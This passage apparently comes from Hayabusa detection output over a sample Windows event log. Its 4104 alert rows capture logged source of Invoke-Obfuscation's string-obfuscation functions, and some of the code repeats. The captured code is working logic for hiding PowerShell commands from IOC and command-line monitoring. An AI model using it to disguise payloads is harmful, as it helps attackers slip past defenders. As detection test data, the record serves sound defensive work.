PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('1', '2', '3')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = (Get-Random -Input @(1..3)) # Default to random obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-StringDelimitedAndConcatenated $ScriptString} 2 {$ScriptString = Out-StringDelimitedConcatenatedAndReordered $ScriptString} 3 {$ScriptString = Out-StringReversed $ScriptString} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Obfuscation.""; Exit} } Return $ScriptString } Function Out-StringDelimitedAndConcatenated { <# .SYNOPSIS Generates delimited and concatenated version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedAndConcatenated Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString (located in Out-ObfuscatedTokenCommand.ps1), Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1), Out-RandomCase (located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedAndConcatenated delimits and concatenates an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedAndConcatenated ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" (('Write-Ho'+'s'+'t'+' {'+'0'+'}'+'Hell'+'o Wor'+'l'+'d!'+'{'+'0'+'} -Foreground'+'Color G'+'ree'+'n; Writ'+'e-'+'H'+'ost {0}Obf'+'usc'+'a'+'tion R'+'o'+'ck'+'s!{'+'0} -Fo'+'reg'+'ro'+'undColor'+' '+'Gree'+'n')-F[Char]39) | Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) # Characters we will substitute (in random order) with randomly generated delimiters. $CharsToReplace = @('$','|','`','\','""',""'"") $CharsToReplace = (Get-Random -Input $CharsToReplace -Count $CharsToReplace.Count) # If $ScriptString does not contain any characters in $CharsToReplace then simply return as is. $ContainsCharsToReplace = $FALSE ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { $ContainsCharsToReplace = $TRUE Break } } If(!$ContainsCharsToReplace) { # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' If(!$PSBoundParameters['PassThru']) { # Encapsulate in necessary IEX/Invoke-Expression(s). $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } # Characters we will use to generate random delimiters to replace the above characters. # For simplicity do NOT include single- or double-quotes in this array. $CharsToReplaceWith = @(0..9) $CharsToReplaceWith += @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $CharsToReplaceWith += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') $DelimiterLength = 3 # Multi-dimensional table containing delimiter/replacement key pairs for building final command to reverse substitutions. $DelimiterTable = @() # Iterate through and replace each character in $CharsToReplace in $ScriptString with randomly generated delimiters. ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { # Create random delimiter of length $DelimiterLength with characters from $CharsToReplaceWith. If($CharsToReplaceWith.Count -lt $DelimiterLength) {$DelimiterLength = $CharsToReplaceWith.Count} $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' # Keep generating random delimiters until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($Delim.ToLower())) { $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' If($DelimiterLength -lt $CharsToReplaceWith.Count) { $DelimiterLength++ } } # Add current delimiter/replacement key pair for building final command to reverse substitutions. $DelimiterTable += , @($Delim,$CharToReplace) # Replace current character to replace with the generated delimiter $ScriptString = $ScriptString.Replace($CharToReplace,$Delim) } } # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes = @() ForEach($DelimiterArray in $DelimiterTable) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly choose between a single quote and double quote. $RandomQuote = Get-Random -InputObject @(""'"",""`"""") # Make sure $RandomQuote is opposite of $OriginalChar contents if it is a single- or double-quote. If($OriginalChar -eq ""'"") {$RandomQuote = '""'} Else {$RandomQuote = ""'""} # Add quotes. $Delimiter = $RandomQuote + $Delimiter + $RandomQuote $OriginalChar = $RandomQuote + $OriginalChar + $RandomQuote # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes += , @($Delimiter,$OriginalChar) } # Reverse the delimiters when building back out the reversing command. [Array]::Reverse($DelimiterTable) # Select random method for building command to reverse the above substitutions to execute the original command. # Avoid using the -f format operator (switch option 3) if curly braces are found in $ScriptString. If(($ScriptString.Contains('{')) -AND ($ScriptString.Contains('}'))) { $RandomInput = Get-Random -Input (1..2) } Else { $RandomInput = Get-Random -Input (1..3) } # Randomize the case of selected variable syntaxes. $StringStr = Out-RandomCase 'string' $CharStr = Out-RandomCase 'char' $ReplaceStr = Out-RandomCase 'replace' $CReplaceStr = Out-RandomCase 'creplace' Switch($RandomInput) { 1 { # 1) .Replace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- and double-quote. If($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$StringStr][$CharStr]39"" $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } ElseIf($OriginalChar[1] -eq '""') { $OriginalChar = ""[$StringStr][$CharStr]34"" } Else { If(Get-Random -Input (0..1)) { $OriginalChar = ""[$StringStr][$CharStr]"" + [Int][Char]$OriginalChar[1] } } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Delimiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Add reversing commands to $ReversingCommand. $ReversingCommand = "".$ReplaceStr($Delimiter,$OriginalChar)"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = $ScriptString + $ReversingCommand } 2 { # 2) -Replace/-CReplace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Del",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.249 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedStringCommand { <# .SYNOPSIS Master function that orchestrates the application of all string-based obfuscation functions to provided PowerShell script. Invoke-Obfuscation Function: Out-ObfuscatedStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given input PowerShell payload. If not defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. The available ObfuscationLevel/function mappings are: 1 --> Out-StringDelimitedAndConcatenated 2 --> Out-StringDelimitedConcatenatedAndReordered 3 --> Out-StringReversed .EXAMPLE C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 IEX ((('Write-H'+'ost x'+'lcHello'+' Wor'+'ld!xlc -F'+'oregroundC'+'o'+'lor Gre'+'en'+'; Write-Host '+'xlcObf'+'u'+'sc'+'ation '+'Rocks!xl'+'c'+' '+'-'+'Foregrou'+'nd'+'C'+'olor Green') -Replace 'xlc',[Char]39) ) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 IEX( ((""{17}{1}{6}{19}{14}{3}{5}{13}{16}{11}{20}{15}{10}{12}{2}{4}{8}{18}{7}{9}{0}"" -f ' Green','-H',' ',' ','R','-Foregr','ost qR9He','!qR9 -Foregr','o','oundColor','catio',' ','n','oundColor','qR9','bfus',' Green; Write-Host','Write','cks','llo World!','qR9O')).Replace('qR9',[String][Char]39)) C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 $I4 =""noisserpxE-ekovnI|)93]rahC[]gnirtS[,'1Yp'(ecalpeR.)'ne'+'erG roloCd'+'nuo'+'rgero'+'F- 1'+'Y'+'p!s'+'kcoR'+' noit'+'a'+'cs'+'ufbO'+'1'+'Yp '+'tsoH'+'-etirW'+' ;'+'neer'+'G '+'rol'+'oCdnu'+'orger'+'o'+'F'+'-'+' 1'+'Yp'+'!dlroW '+'olleH1Yp '+'t'+'s'+'oH-et'+'irW'( "" ;$I4[ -1 ..- ($I4.Length ) ] -Join '' | Invoke-Expression .NOTES Out-ObfuscatedStringCommand orchestrates the application of all string-based obfuscation functions (casting ENTIRE command to a string a performing string obfuscation functions) to provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $ObfuscationLevel is defined then Out-ObfuscatedStringCommand will automatically choose a random obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('1', '2', '3')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = (Get-Random -Input @(1..3)) # Default to random obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-StringDelimitedAndConcatenated $ScriptString} 2 {$ScriptString = Out-StringDelimitedConcatenatedAndReordered $ScriptString} 3 {$ScriptString = Out-StringReversed $ScriptString} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Obfuscation.""; Exit} } Return $ScriptString } Function Out-StringDelimitedAndConcatenated { <# .SYNOPSIS Generates delimited and concatenated version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedAndConcatenated Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString (located in Out-ObfuscatedTokenCommand.ps1), Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1), Out-RandomCase (located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedAndConcatenated delimits and concatenates an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedAndConcatenated ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" (('Write-Ho'+'s'+'t'+' {'+'0'+'}'+'Hell'+'o Wor'+'l'+'d!'+'{'+'0'+'} -Foreground'+'Color G'+'ree'+'n; Writ'+'e-'+'H'+'ost {0}Obf'+'usc'+'a'+'tion R'+'o'+'ck'+'s!{'+'0} -Fo'+'reg'+'ro'+'undColor'+' '+'Gree'+'n')-F[Char]39) | Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) # Characters we will substitute (in random order) with randomly generated delimiters. $CharsToReplace = @('$','|','`','\','""',""'"") $CharsToReplace = (Get-Random -Input $CharsToReplace -Count $CharsToReplace.Count) # If $ScriptString does not contain any characters in $CharsToReplace then simply return as is. $ContainsCharsToReplace = $FALSE ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { $ContainsCharsToReplace = $TRUE Break } } If(!$ContainsCharsToReplace) { # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' If(!$PSBoundParameters['PassThru']) { # Encapsulate in necessary IEX/Invoke-Expression(s). $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } # Characters we will use to generate random delimiters to replace the above characters. # For simplicity do NOT include single- or double-quotes in this array. $CharsToReplaceWith = @(0..9) $CharsToReplaceWith += @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $CharsToReplaceWith += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') $DelimiterLength = 3 # Multi-dimensional table containing delimiter/replacement key pairs for building final command to reverse substitutions. $DelimiterTable = @() # Iterate through and replace each character in $CharsToReplace in $ScriptString with randomly generated delimiters. ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { # Create random delimiter of length $DelimiterLength with characters from $CharsToReplaceWith. If($CharsToReplaceWith.Count -lt $DelimiterLength) {$DelimiterLength = $CharsToReplaceWith.Count} $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' # Keep generating random delimiters until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($Delim.ToLower())) { $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' If($DelimiterLength -lt $CharsToReplaceWith.Count) { $DelimiterLength++ } } # Add current delimiter/replacement key pair for building final command to reverse substitutions. $DelimiterTable += , @($Delim,$CharToReplace) # Replace current character to replace with the generated delimiter $ScriptString = $ScriptString.Replace($CharToReplace,$Delim) } } # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes = @() ForEach($DelimiterArray in $DelimiterTable) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly choose between a single quote and double quote. $RandomQuote = Get-Random -InputObject @(""'"",""`"""") # Make sure $RandomQuote is opposite of $OriginalChar contents if it is a single- or double-quote. If($OriginalChar -eq ""'"") {$RandomQuote = '""'} Else {$RandomQuote = ""'""} # Add quotes. $Delimiter = $RandomQuote + $Delimiter + $RandomQuote $OriginalChar = $RandomQuote + $OriginalChar + $RandomQuote # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes += , @($Delimiter,$OriginalChar) } # Reverse the delimiters when building back out the reversing command. [Array]::Reverse($DelimiterTable) # Select random method for building command to reverse the above substitutions to execute the original command. # Avoid using the -f format operator (switch option 3) if curly braces are found in $ScriptString. If(($ScriptString.Contains('{')) -AND ($ScriptString.Contains('}'))) { $RandomInput = Get-Random -Input (1..2) } Else { $RandomInput = Get-Random -Input (1..3) } # Randomize the case of selected variable syntaxes. $StringStr = Out-RandomCase 'string' $CharStr = Out-RandomCase 'char' $ReplaceStr = Out-RandomCase 'replace' $CReplaceStr = Out-RandomCase 'creplace' Switch($RandomInput) { 1 { # 1) .Replace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- and double-quote. If($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$StringStr][$CharStr]39"" $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } ElseIf($OriginalChar[1] -eq '""') { $OriginalChar = ""[$StringStr][$CharStr]34"" } Else { If(Get-Random -Input (0..1)) { $OriginalChar = ""[$StringStr][$CharStr]"" + [Int][Char]$OriginalChar[1] } } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Delimiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Add reversing commands to $ReversingCommand. $ReversingCommand = "".$ReplaceStr($Delimiter,$OriginalChar)"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = $ScriptString + $ReversingCommand } 2 { # 2) -Replace/-CReplace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Del",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.249 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"imiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Randomly choose between -Replace and the lesser-known case-sensitive -CReplace. $Replace = (Get-Random -Input @(""-$ReplaceStr"",""-$CReplaceStr"")) # Add reversing commands to $ReversingCommand. Whitespace before and after $Replace is optional. $ReversingCommand = ' '*(Get-Random -Minimum 0 -Maximum 3) + $Replace + ' '*(Get-Random -Minimum 0 -Maximum 3) + ""$Delimiter,$OriginalChar"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = '(' + $ScriptString + $ReversingCommand + ')' } 3 { # 3) -f format operator $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" $Counter = 0 # Iterate delimiters in reverse for simpler creation of the proper order for $ReversingCommand. For($i=$DelimiterTableWithQuotes.Count-1; $i -ge 0; $i--) { $DelimiterArray = $DelimiterTableWithQuotes[$i] $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] $DelimiterNoQuotes = $Delimiter.SubString(1,$Delimiter.Length-2) # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Build out delimiter order to add as arguments to the final -f format operator. $ReversingCommand = $ReversingCommand + "",$OriginalChar"" # Substitute each delimited character with placeholder for -f format operator. $ScriptString = $ScriptString.Replace($DelimiterNoQuotes,""{$Counter}"") $Counter++ } # Trim leading comma from $ReversingCommand. $ReversingCommand = $ReversingCommand.Trim(',') # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. Whitespace before and after -f format operator is optional. $FormatOperator = (Get-Random -Input @('-f','-F')) $ScriptString = '(' + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + $FormatOperator + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ReversingCommand + ')' } default {Write-Error ""An invalid `$RandomInput value ($RandomInput) was passed to switch block.""; Exit;} } # Encapsulate $ScriptString in necessary IEX/Invoke-Expression(s) if -PassThru switch was not specified. If(!$PSBoundParameters['PassThru']) { $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } Function Out-StringDelimitedConcatenatedAndReordered { <# .SYNOPSIS Generates delimited, concatenated and reordered version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedConcatenatedAndReordered Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedConcatenatedAndReordered delimits, concatenates and reorders the concatenated substrings of an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedConcatenatedAndReordered ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" ((""{16}{5}{6}{14}{3}{19}{15}{10}{18}{17}{0}{2}{7}{8}{12}{9}{11}{4}{13}{1}""-f't','en','ion R','9 -Fore','Gr','e-Host 0i9Hello W','or','ocks!0i9 -Fo','regroun','olo','ite-Hos','r ','dC','e','ld!0i','; Wr','Writ','sca','t 0i9Obfu','groundColor Green')).Replace('0i9',[String][Char]39) |IEX .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) If(!$PSBoundParameters['PassThru']) { # Convert $ScriptString to delimited and concatenated string and encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString } Else { # Convert $ScriptString to delimited and concatenated string and do no encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString -PassThru } # Parse out concatenated strings to re-order them. $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $GroupStartCount = 0 $ConcatenatedStringsIndexStart = $NULL $ConcatenatedStringsIndexEnd = $NULL $ConcatenatedStringsArray = @() For($i=0; $i -le $Tokens.Count-1; $i++) { $Token = $Tokens[$i] If(($Token.Type -eq 'GroupStart') -AND ($Token.Content -eq '(')) { $GroupStartCount = 1 $ConcatenatedStringsIndexStart = $Token.Start+1 } ElseIf(($Token.Type -eq 'GroupEnd') -AND ($Token.Content -eq ')') -OR ($Token.Type -eq 'Operator') -AND ($Token.Content -ne '+')) { $GroupStartCount-- $ConcatenatedStringsIndexEnd = $Token.Start # Stop parsing concatenated string. If(($GroupStartCount -eq 0) -AND 